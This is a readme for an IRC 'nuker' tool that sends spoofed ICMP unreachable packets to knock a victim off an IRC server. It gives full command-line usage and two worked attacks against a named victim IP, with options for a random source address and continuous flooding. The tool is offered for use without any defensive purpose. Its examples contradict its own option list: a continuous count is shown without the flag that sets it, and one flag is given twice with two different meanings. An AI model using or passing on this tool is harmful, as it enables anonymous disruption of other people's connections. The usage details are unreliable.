
  Spoofed IRC Nuker Version 1.3
  =============================

  This program is like the click nuker. But this one can spoof your real ip.

  Note: This program is only tested on Windows XP.


  I. USAGE
  =============================

  sin.exe <client> <server> [options]

  Options:
    -C:    Client port range (format: 1024-4000 (default))
    -S:    Server port range (format: 6667-6667 (default))
    -t:    ICMP type         (default 3)
    -c:    ICMP code         (default 2)
    -s:    Spoof host        (0 is random (default))
    -n:    Num of attacks    (default 1) (0 is continuous)
    -d:    Delay (in ms)     (default 0)


  Example I: sin 217.155.32.170 address.of.irc.server

  On this attack:

  - Victim: 217.155.32.170
  - IRC Server: address.of.irc.server
  - Client Port Range: 1024-4000
  - Server Port Range: 6667-6667
  - ICMP Type: 3
  - ICMP Code: 2
  - Spoof IP: Random
  - Count: Continuous
  - Delay: 0 ms (no delay between packets)


  Example II: sin 217.155.32.170 irc.xnet.org -C 1024-1500 -S 6666-6669
              -S another.op.on.irc -d 50

  On this attack:

  - Victim: 217.155.32.170
  - IRC Server: irc.xnet.org
  - Client Port Range: 1024-1500
  - Server Port Range: 6666-6669
  - ICMP Type: 3
  - ICMP Code: 2
  - Spoof IP/Host: another.op.on.irc
  - Count: Continuous
  - Delay: 50 ms


  II. CONTACT
  =============================
  MSN: metinsdr@hotmail.com
  UIN: 470734

